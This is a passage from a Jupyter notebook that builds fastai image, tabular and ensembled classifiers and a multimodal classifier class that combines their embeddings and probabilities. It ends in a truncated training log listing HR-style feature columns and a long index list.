get_fastai_docs_embs(docs=df[txt_cols[0]] #['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n, learn=clf, lm=None, df=df, txt_col=txt_cols[0])\n\n#dbck: compute cosine similarity bw e1 and e2, expect the similarity is closed to 1\nfrom sklearn.metrics.pairwise import cosine_similarity as cs\n[cs(x1.reshape(1,-1),x2.reshape(1,-1)) for (x1,x2) in zip(e1, e2)]\npd.DataFrame(e1).shape\n\"\"\"", "_____no_output_____" ], [ "#pd.DataFrame(e1, index=df.index)", "_____no_output_____" ], [ "#pd.DataFrame(e2, index=df.index)", "_____no_output_____" ] ], [ [ "# 2) fastai image classifier\n", "_____no_output_____" ] ], [ [ "#export\n#from fastai.vision.all import *\n\ndef train_fastai_image_classifier(df:pd.DataFrame, label_col:str, img_col:str, img_path:str, model_path:str, model_name:str, lr:float=0.005, max_epochs:int=100, img_size:int=224, bs:int=64, emb_size:int=128):\n \"\"\"train and evaluate a fastai image classifier, where image data is stored under `path`, where df stores the path of each image file\n Args:\n df:pd.DataFrame, 
\n img_col:str,\n img_path:str, the folder where the images are stored e.g. '/root/.fastai/data/mnist_tiny'\n model_path:str, the folder where the image classifier is stored\n model_name:str, \n lr:float=0.005, \n max_epochs:int=100\n img_size:int=224,\n emb_size:int=128 embedding size \n bs:int=64\n Returns:\n img_learn: a trained image classifier\n\n\n Example:\n path = untar_data(URLs.MNIST_TINY)\n df = pd.read_csv(path/'labels.csv')\n print(df)\n img_col='name'\n label_col='label'\n img_path = '/root/.fastai/data/mnist_tiny'\n img_clf = train_fastai_image_classifier(df=df, img_col=img_col, img_path=img_path, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n \"\"\"\n # make sure df[[img_col]] is without img_path in it\n import re\n def f(row, img_path=img_path):\n #make sure img_path ended with '/' e.g. img_path='/root/.keras/datasets/tweet_images/'\n if img_path[-1]!='/':\n img_path+='/'\n return re.sub(img_path, '', row)\n \n df[img_col] = df[img_col].apply(lambda row: f(row))\n print(f'==========dbck df[[img_col]] is without img_path={img_path} in it===========\\n{df[[img_col]].head()}')\n\n # load images fr df into dls\n from pathlib import Path \n def get_dls(emb_size, bs):\n \"\"\" unify the size of input images on a batch, in order to deal with the following Error:\n RuntimeError: stack expects each tensor to be equal size, but got [3, 298, 273] at entry 0 and [3, 480, 480] at entry 1\n Ref: https://forums.fast.ai/t/what-to-do-if-raw-image-is-very-large-cpu-bottleneck/88432/2\n \"\"\"\n dls = ImageDataLoaders.from_df(df,\n path=Path(img_path),\n fn_col=img_col, #'path'\n #valid_col='is_val',\n label_col=label_col,#'target',\n y_block=CategoryBlock,\n item_tfms=Resize(emb_size, method=ResizeMethod.Squish),\n batch_tfms=aug_transforms(size=img_size),\n bs=bs)\n\n return dls\n\n dls = get_dls(emb_size=emb_size, bs=bs) # replace: dls = ImageDataLoaders.from_df(df=df,fn_col=img_col, label_col=label_col, path=Path(img_path))\n \n f1=FBeta(beta=1, 
average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[error_rate, accuracy, precision, recall, f1]\n img_learn = cnn_learner(dls, resnet34, metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(img_learn.lr_find())[0]\n\n # fit learner\n img_learn.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n img_learn.freeze_to(-2)\n img_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n img_learn.freeze_to(-3)\n img_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain until it making no progress in val_lose\n img_learn.unfreeze()\n #replace: img_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n img_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n img_learn.save(model_path+model_name)\n return img_learn\n\n#img_clf = train_eval_fastai_image_classifier(df=df, img_col=img_col, img_path=img_path, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n", "_____no_output_____" ], [ "\"\"\"#example1\npath = untar_data(URLs.MNIST_TINY)\ndf_ = pd.read_csv(path/'labels.csv')\nprint(df_)\nimg_col_='name'\nlabel_col_='label'\nimg_path_ = '/root/.fastai/data/mnist_tiny'\nimg_clf, dls = train_fastai_image_classifier(df=df_,label_col=label_col_, img_col=img_col_, img_path=img_path_, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n\"\"\"", "_____no_output_____" ], [ "\"\"\"# another example\nif len(img_cols)>0:\n img_clf = train_fastai_image_classifier(df=df, \n label_col=label_col, \n img_col=img_cols[0], \n img_path='/root/.keras/datasets/tweet_images', \n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n model_name=img_cols[0]+'_clf', \n lr=0.005, \n 
max_epochs=100)\"\"\"\n", "_____no_output_____" ] ], [ [ "## module: get_fastai_imgs_embs()", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_imgs_embs(img_clf, df:pd.DataFrame=None, img_col:str=None):\n \"\"\"use classifier to get image embedding vector (np.array)\n Args:\n img_clf: e.g. fastai.learner.Learner\n df[[img_col]] store the path of image files\n Returns:\n embs: a np.array of shape (num_samples, 512)\n\n Examples: \n img_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(5), img_col='name')\n \n \"\"\"\n # define pytorch hook\n class SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()\n # identify the layer from which you want to get embeddings\n #print(img_clf.model) \n print(f'====== We will get embedding from {img_clf.model[1][4]} =======')\n emb_layer = img_clf.model[1][4]\n #put hook on the selected emb_layer\n sf = SaveFeatures(emb_layer)\n\n # access dls from the trained classifier\n test_df = df[[img_col]]\n test_dl = img_clf.dls.test_dl(test_df, with_labels=False)\n \n # run img_clf through test data\n preds, _ = img_clf.get_preds(dl=test_dl)\n # get the embeddings of test data\n embs = sf.features\n \n return embs\n\n", "_____no_output_____" ], [ "\"\"\"#dbck\nimg_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(), img_col=img_cols[0])\nimg_embs.shape\"\"\"", "_____no_output_____" ] ], [ [ "# 3) fastai tabular classifer", "_____no_output_____" ] ], [ [ "#export\n\n#from fastai.tabular.all import *\n\ndef split_idxs(df, train_size=.9, flag_random_split=True):\n \"\"\" split df index into 2 parts: train_idxs and test_idxs \n Args:\n df: the dataframe of all your data\n train_size (float in [0,1], 
default 0.9)\n flag_random_split(bool, default False): do you want random split idxs?\n Returns:\n (ls_train, ls_test): a 2-tuple of lists for train indices and test indices\n\n Example:\n df = pd.DataFrame({'c1':list(range(26)), 'c2':list(string.ascii_lowercase)})\n splits = split_idxs(df)\n ...\n # use splits to build TabularPandas taublar object\n to = TabularPandas(df, \n procs=procs,\n cat_names=cat_names,\n cont_names=cont_names,\n y_names=y_names,\n y_block=y_block,\n splits=splits)\n \"\"\"\n import random\n ls = range_of(df)\n print(ls)\n if flag_random_split:\n splits = RandomSplitter()(ls)\n else:\n ls_train = ls[:int(df.shape[0]*train_size)]\n ls_test = ls[int(df.shape[0]*train_size):]\n random.shuffle(ls_train)\n random.shuffle(ls_test)\n splits = (ls_train, ls_test)\n return splits\n\ndef train_fastai_tabular_classifier(df:pd.DataFrame, label_col:str, cnt_cols:list=None, cat_cols:list=None, lr:float=0.005, max_epochs:int=100, model_path:str='/content/drive/My Drive/techskills/model/', model_name:str='tabular_model'):\n \"\"\"train an ensembled classifier input with embs_ls, which is a list of embeddings\n Args:\n df:pd.DataFrame,\n label_col:str,\n cnt_cols:list of str\n cat_cols:list of str\n lr:float=0.005 learning rate\n max_epochs:int=10 number of epochs to train a tabular learner when unfreeze the whole model\n model_path:str='/content/drive/My Drive/techskills/model/', \n model_name:str='tabular_model', \n Returns:\n tab_learner: a trained fastai tabular classifier\n \"\"\"\n if cnt_cols is None or cat_cols is None:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=.5, excluded_cols = [label_col], txt_card=0.5)\n print(f'** Given label_col={label_col} ** \\n======= automatically identify\\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect; otherwise, manually make changes')\n\n # define variables\n 
y_names = label_col\n cat_names = cat_cols\n cont_names = cnt_cols\n tab_cols = [label_col]+cnt_cols+cat_cols\n\n # build fastai tabular dataloader \n procs = [Categorify, FillMissing, Normalize]\n splits = split_idxs(df[tab_cols], train_size=.9, flag_random_split=True)\n to = TabularPandas(df[tab_cols], \n procs, \n cat_names, \n cont_names,\n y_names=y_names, \n y_block=CategoryBlock(),\n splits=splits)\n\n tab_dls = to.dataloaders(bs=8) \n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n\n # tabular learner\n tab_learn = tabular_learner(dls=tab_dls, layers=[200,100], metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(tab_learn.lr_find())[0]\n\n # fit learner\n tab_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n tab_learn.freeze_to(-2)\n tab_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n tab_learn.freeze_to(-3)\n tab_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain\n tab_learn.unfreeze()\n #tab_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n tab_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n tab_learn.save(model_path+model_name)\n return tab_learn\n\n\n\n", "_____no_output_____" ] ], [ [ "### module: get_fastai_tab_embs()", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_tab_embs(tab_clf, df:pd.DataFrame, cnt_cols:list=None, cat_cols:list=None):\n \"\"\"use classifier to get image embedding vector (np.array)\n Args:\n tab_clf: e.g. 
fastai.tabular.learner.TabularLearner\n df[cnt_cols+cat_cols]\n Returns:\n embs: a np.array of shape (num_samples, 512)\n\n Examples: \n img_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(5), img_col='name')\n \n \"\"\"\n # define pytorch hook\n class SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()\n # identify the layer from which you want to get embeddings\n #print(img_clf.model) \n print(f'====== We will get embedding from {tab_clf.model.layers[1][0]} =======')\n emb_layer = tab_clf.model.layers[1][0]\n #put hook on the selected emb_layer\n sf = SaveFeatures(emb_layer)\n\n # access dls from the trained classifier\n #?? no needed?? test_df = df[cnt_cols+cat_cols]\n test_dl = tab_clf.dls.test_dl(df, with_labels=False)\n \n # run img_clf through test data\n preds, _ = tab_clf.get_preds(dl=test_dl)\n # get the embeddings of test data\n embs = sf.features\n\n return embs\n\n", "_____no_output_____" ], [ "\"\"\"#dbck\ntab_embs = get_fastai_tab_embs(tab_clf=tab_learn, df=df_.head(5))\n\ntab_embs.shape\"\"\"", "_____no_output_____" ] ], [ [ "# 4) ensembled models\n\nBig idea: you can blend multiple classifiers at different stages:\n\n- `early concat`: concatinate cnt, cat, txt, img after data loading and data preprocessing, followed by a learner of choice (e.g. 
fastai tabular).\n- `middle concat`: concatinate the embeddings from each of the trained tab (cnt+cat), txt, img models, followed by a learner of choice.\n- `late concat`: concatinate the probability predictions from each of the trained tab(cnt+cat), txt, img models, followed by a learner of choice.\n\n\nHere I will do experiment on the `middle concat`: blend embedding(txt_col1) and embedding(img_col2) by a fastai tabular learner.", "_____no_output_____" ], [ "## module: train_ensembled_classifier()", "_____no_output_____" ] ], [ [ "#export\ndef train_ensembled_classifier(embs_ls, lr:float=0.005, max_epochs:int=10, model_path:str='/content/drive/My Drive/fastai_multimodal/model/', model_name:str='tabular_ensemble_enbeddings', n_components:float=1, df=df, label_col=label_col, emb_size=128):\n \"\"\"train an ensembled classifier, using fastai tabular \n Args:\n embs_ls:list of embeddings, each embeddings is a list of 400D-vectors\n lr:float=0.005 learning rate\n max_epochs:int=10 number of epochs to train a tabular learner when unfreeze the whole model\n model_path:str='/content/drive/My Drive/techskills/model/', \n model_name:str='tabular_ensemble_enbeddings', \n n_components:Union[int, float]=1 if use n_components!=1, use PCA to reduce embs_ls' dimension for the sake of fast computation at the price of accuracy; otherwise, do not use PCA\n emb_size:int=128 embedding size\n Returns:\n tab_learner: a trained fastai tabular classifier\n \"\"\"\n \n # create a new df containing label_col plus all txt_cols' embeddings\n # reduce the dimension of df_embs by PCA\n if n_components != 1:\n from sklearn.decomposition import PCA\n pca = PCA(n_components=n_components)\n df_embs = pd.concat([df[[label_col]]]+[pd.DataFrame(pca.fit_transform(embs), index=df.index) for embs in embs_ls], axis=1)\n df_embs.columns = [label_col]+ list(range(df_embs.shape[1]-1)) #fix the repeated column names problem which comes from pd.concat dfs \n else:\n df_embs = 
pd.concat([df[[label_col]]]+[pd.DataFrame(embs, index=df.index) for embs in embs_ls], axis=1)\n df_embs.columns = [label_col]+ list(range(df_embs.shape[1]-1))\n\n # define variables\n y_names = label_col\n cat_names = []\n cont_names = list(df_embs.columns)[1:]\n tab_cols = [y_names]+cat_names+cont_names\n\n # build fastai tabular dataloader \n procs = [Categorify, FillMissing, Normalize]\n splits = split_idxs(df_embs[tab_cols], train_size=.9, flag_random_split=True)\n to = TabularPandas(df_embs[tab_cols], \n procs, \n cat_names, \n cont_names,\n y_names=y_names, \n y_block=CategoryBlock(),\n splits=splits)\n\n tab_dls = to.dataloaders(bs=8) \n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n\n # tabular learner\n ensembled_learn = tabular_learner(dls=tab_dls, layers=[2*emb_size,emb_size], metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(ensembled_learn.lr_find())[0]\n\n # fit learner\n ensembled_learn.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n ensembled_learn.freeze_to(-2)\n ensembled_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n ensembled_learn.freeze_to(-3)\n ensembled_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain\n ensembled_learn.unfreeze()\n #tab_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n ensembled_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n ensembled_learn.save(model_path+model_name)\n return ensembled_learn\n\n", "_____no_output_____" ], [ "\"\"\"ensembled_learn = train_ensembled_classifier(embs_ls)\"\"\"", "_____no_output_____" ], [ "\"\"\"df_ = pd.concat([pd.DataFrame(embs) 
for embs in embs_ls], axis=1)\ndf_.columns = list(range(df_.shape[1]))\n\ntest_dl = ensembled_learn.dls.test_dl(df_) #, with_labels=True\nprobs, _ = ensembled_learn.get_preds(dl=test_dl)\n\nprobs\"\"\"\n", "_____no_output_____" ] ], [ [ "# 5) End2End fastai multimodal model", "_____no_output_____" ] ], [ [ "#export\nclass Fastai_Multimodal_Classifier():\n \"\"\"end to end fastai classifier for multimodal data which includes txt_cols, img_cols, cnt_cols, cat_cols\"\"\"\n def __init__(self, txt_clfs=None, lms=None, tab_clf=None, img_clfs=None, ensembled_clf_embs=None, ensembled_clf_probs=None, model_path='/content/drive/My Drive/fastai_multimodal/model/' ):\n self.txt_clfs = txt_clfs # a list of fastai text classifiers\n self.lms = lms # a list of fastai text language models\n self.tab_clf = tab_clf # a fastai tabular classifier\n self.img_clfs = img_clfs # a list of fastai image classifiers\n self.ensembled_clf_embs = ensembled_clf_embs # a ensembled classifier trained on embs_ls (at this point, using fastai tabular)\n self.ensembled_clf_probs = ensembled_clf_probs # a ensembled classifier trained on probs_ls (at this point, using fastai tabular)\n self.model_path=model_path\n\n \"\"\"def identify_cnt_cat_txt_img(self, df, label_col, cnt_card=0.5, txt_card=0.5):\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=cnt_card, excluded_cols = [label_col], txt_card=txt_card)\n self.txt_cols=txt_cols\n self.cnt_cols=cnt_cols\n self.cat_cols=cat_cols\n self.img_cols=img_cols\"\"\"\n \n def fit(self, df:pd.DataFrame, label_col:str, txt_cols:list=None, img_cols:list=None, cnt_cols:list=None, cat_cols:list=None, img_path:str=img_path):\n \"\"\" In case not provided,\n fit multiple fastai text classifiers for each col in txt_cols;\n fit multiple fastai img classifiers for each col in img_cols;\n fit one fastai tabular classifier for all cnt_cols and cat_cols.\n Args:\n df:pd.DataFrame, containing both label_col and 
txt_cols \n label_col:str, e.g. 'label'\n txt_cols:list, e.g. ['title_raw',\t'hard_skills_name',\t'title_raw+hard_skills_name']\n img_cols:list, \n cnt_cols:list, \n cat_cols:list\n img_path:str\n Returns:\n None (but update self.txt_clfs, self.lms, self.tab_clf)\n \"\"\"\n df = df.copy()\n \n # in case not provided by user, automatically identify various feature types\n if all(x is None for x in (txt_cols, img_cols, cnt_cols, cat_cols)): \n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=.5, excluded_cols = [label_col], txt_card=0.5)\n print(f'** Given label_col={label_col} ** \\n======= automatically identify\\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect; otherwise, manually make changes')\n else: # store columns info in unchangable container\n class CONST(object):\n __slots__ = ()\n cat_cols = cat_cols\n cnt_cols = cnt_cols\n txt_cols = txt_cols\n img_cols = img_cols\n label_col = label_col\n df = df\n c = CONST()\n self.c = c\n\n # convert dtype from object to str & add bin cnt columns to df; also fill missing value\n for col in df.columns:\n if df[[col]].dtypes[col]==np.dtype('O'):\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n if col in cat_cols: # force cat_col to be str type, whether the original one is str or int\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n df[col].fillna(df[col].mode()[0], inplace=True)\n\n \n # since tf.one_hot() does not work withs strings label but integer, convert df[label_col] into integer value\n label_str2num_map = {x:n for (n,x) in enumerate(sorted(df[label_col].unique()))}\n \n # store the cols/features type info\n self.txt_cols=c.txt_cols\n self.cnt_cols=c.cnt_cols\n self.cat_cols=c.cat_cols\n self.img_cols=c.img_cols\n self.label_col=c.label_col\n self.df=df\n self.img_path=img_path\n\n # in case self.tab_clf = None, make 
tab_clf from stratch\n if self.tab_clf is None and len(c.cnt_cols+c.cat_cols)>0:\n print(f'========================= training classifier with \\n cnt_cols={cnt_cols} and \\n cat_cols={cat_cols}==============================')\n tab_clf = train_fastai_tabular_classifier(c.df, \n cnt_cols=c.cnt_cols,\n cat_cols=c.cat_cols,\n label_col=c.label_col,\n model_path=self.model_path,\n lr=0.005\n )\n\n self.tab_clf = tab_clf\n else:\n self.tab_clf = None\n\n # in case self.txt_clfs = None, train txt_clfs from stratch\n if self.txt_clfs is None and len(c.txt_cols)>0:\n txt_clfs = []\n lms = []\n for txt_col in c.txt_cols:\n print(f'========================= training classifier with txt_col={txt_col}==============================')\n lm, txt_clf = train_fastai_text_classifier(self.df, \n txt_col=txt_col,\n label_col=self.label_col,\n model_path=self.model_path,\n lr=0.005,\n )\n txt_clfs.append(txt_clf)\n lms.append(lm)\n self.txt_clfs = txt_clfs\n self.lms = lms\n\n\n # in case self.img_clfs = None, train img_clfs from stratch\n if self.img_clfs is None and len(c.img_cols)>0:\n img_clfs = []\n\n for img_col in c.img_cols:\n print(f'========================= training classifier with img_col={img_col}==============================')\n img_clf = train_fastai_image_classifier(self.df, \n img_col=img_col,\n label_col=c.label_col,\n model_path=self.model_path,\n img_path=self.img_path,\n model_name=img_col+'_clf',\n lr=0.005\n )\n img_clfs.append(img_clf)\n\n self.img_clfs = img_clfs\n\n\n\n def get_preds(self, test_df:pd.DataFrame, flag_load_embs_probs=False):\n \"\"\"get predictions for test data df[txt_cols + img_cols + cnt_cols + cat_cols]\n Args:\n test_df:pd.DataFrame, containing txt_cols + img_cols + cnt_cols + cat_cols\n txt_cols:list, img_cols:list, cnt_cols:list, cat_cols:list are features splitted into 4 categories: txt, img, cnt, cat\n Returns:\n (preds0, preds1), (probs0, probs1), where\n - preds0, probs0: the predictions on test data based on txt_clfs, img_clfs, 
tab_clf embeddings extraction `embs_ls`\n - preds1, probs1: the prediction on test data based on txt_clfs, img_clfs, tab_clf output probs_ls\n \n \"\"\"\n df = test_df.copy()\n # convert dtype from object to str & add bin cnt columns to df; also fill missing value\n for col in df.columns:\n if df[[col]].dtypes[col]==np.dtype('O'):\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n if col in cat_cols: # force cat_col to be str type, whether the original one is str or int\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n df[col].fillna(df[col].mode()[0], inplace=True)\n\n #################################\n ### middle concat: use embs_ls\n #################################\n # get docs embeddings list\n if flag_load_embs_probs:\n import pickle\n with open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n else:\n # init embs_ls\n embs_ls = []\n\n # get tab embeddings list\n print(f'========================= extracting tabular embeddings==============================')\n if self.tab_clf is not None and len(self.cnt_cols +self.cat_cols)>0:\n embs = get_fastai_tab_embs(tab_clf=self.tab_clf, df=df, cnt_cols=self.cnt_cols, cat_cols=self.cat_cols)\n embs_ls.append(embs)\n\n # get docs embeddings list\n if len(self.txt_cols)>0:\n for (txt_col, txt_clf, lm) in zip(self.txt_cols, self.txt_clfs, self.lms):\n print(f'========================= extracting txt_col={txt_col} doc embeddings==============================')\n\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=txt_clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n\n # get imgs embeddings list\n if len(self.img_cols)>0:\n for (img_col, img_clf) in zip(self.img_cols, self.img_clfs):\n print(f'========================= extracting img_col={img_col} img embeddings==============================')\n embs = get_fastai_imgs_embs(img_clf=img_clf, df=df, img_col=img_col)\n embs_ls.append(embs)\n \n\n \n # store embs_ls\n self.embs_ls = embs_ls\n import 
pickle\n with open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n\n # train a ensemble classifier using all embeddings\n ensembled_clf_embs = train_ensembled_classifier(embs_ls, df=df, label_col=label_col) \n self.ensembled_clf_embs = ensembled_clf_embs\n \n\n #################################\n ### late concat: use probs_ls\n #################################\n # get prediction on labels and probabilities\n if flag_load_embs_probs:\n import pickle\n with open(\"probs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n else:\n # init probs_ls\n probs_ls = []\n\n # probs by tab_clf\n if self.tab_clf is not None and len(self.c.cnt_cols + self.c.cat_cols)>0:\n print(f'========================= calculating tab_cols ({cnt_cols, cat_cols}) probs==============================')\n tab_cols_ = [col for col in self.cnt_cols + self.cat_cols if col.split('_')[-1]!='na'] # tmp: remove added columns look like '*_na'\n _, probs = fastai_learner_preds(learner=self.tab_clf, df=df[tab_cols_], label_col=self.label_col)\n probs_ls.append(probs.numpy())\n\n # probs by txt_clfs\n if len(self.img_cols)>0:\n for (txt_clf, txt_col) in zip(self.txt_clfs, self.txt_cols):\n print(f'========================= calculating txt_col={txt_col} probs ==============================')\n _, probs = fastai_learner_preds(learner=txt_clf, df=df, label_col=self.label_col, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n # probs by img_clfs\n if len(self.img_cols)>0:\n for (img_clf, img_col) in zip(self.img_clfs, self.img_cols):\n print(f'========================= calculating img_col={img_col} probs==============================')\n\n _, probs = fastai_learner_preds(learner=img_clf, df=df[[img_col]],label_col=self.label_col)\n probs_ls.append(probs.numpy())\n\n # store probs_ls\n self.probs_ls = probs_ls\n\n # train an ensembled classifier using all probs\n ensembled_clf_probs = train_ensembled_classifier(probs_ls, df=df, label_col=label_col) \n self.ensembled_clf_probs = 
ensembled_clf_probs\n\n # in case self.ensembled_clf_embs = None, train ensembled_clfs from stratch\n if self.ensembled_clf_embs is None:\n print(f'========================= training ensembled classifier with embs_ls ==============================')\n ensembled_clf_embs =train_ensembled_classifier(embs_ls, \n lr=0.005, \n max_epochs=100, \n model_path=self.model_path, \n model_name='ensembled_model_embs', \n n_components=1, \n df=df, \n label_col=label_col)\n\n self.ensembled_clf_embs = ensembled_clf_embs\n \n # in case self.ensembled_clf_probs = None, train ensembled_clfs from stratch\n if self.ensembled_clf_probs is None:\n print(f'========================= training ensembled classifier with probs_ls ==============================')\n ensembled_clf_embs =train_ensembled_classifier(probs_ls, \n lr=0.005, \n max_epochs=100, \n model_path=self.model_path, \n model_name='ensembled_model_probs', \n n_components=1, \n df=df, \n label_col=label_col)\n\n self.ensembled_clf_embs = ensembled_clf_embs\n\n # ensembled_clf_embs make predictions on embs_ls\n df_ = pd.concat([pd.DataFrame(embs) for embs in self.embs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n test_dl = self.ensembled_clf_embs.dls.test_dl(df_) #, with_labels=True\n\n \n probs0, _ = self.ensembled_clf_embs.get_preds(dl=test_dl)\n preds0 = probs0.numpy().argmax(axis=1)\n\n # ensembled_clf_probs make predictions on probs_ls\n df_ = pd.concat([pd.DataFrame(probs) for probs in self.probs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n\n test_dl = self.ensembled_clf_probs.dls.test_dl(df_) #, with_labels=True\n probs1, _ = self.ensembled_clf_probs.get_preds(dl=test_dl)\n preds1 = probs0.numpy().argmax(axis=1)\n \n return (preds0, preds1), (probs0, probs1)\n\nmultimodal_clf = Fastai_Multimodal_Classifier()\nmultimodal_clf.fit(df=train_df, label_col=label_col, cnt_cols=cnt_cols, cat_cols=cat_cols,txt_cols=txt_cols,img_cols=img_cols)\n(preds0, preds1), (probs0, probs1) = 
multimodal_clf.get_preds(test_df)\n(preds0, preds1), (probs0, probs1)", "========================= training classifier with \n cnt_cols=['age', 'cumulative_peer_exit_count', 'is_optional', 'is_organizer', 'length_of_service', 'manager_length_of_service', 'meeting_lapse', 'num_direct_reports', 'start_datetime_Dayofyear', 'time_since_last_promotion', 'time_since_new_manager_start_date', 'time_since_new_org_start_date', 'timestamp'] and \n cat_cols=['job_family', 'start_datetime']==============================\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 
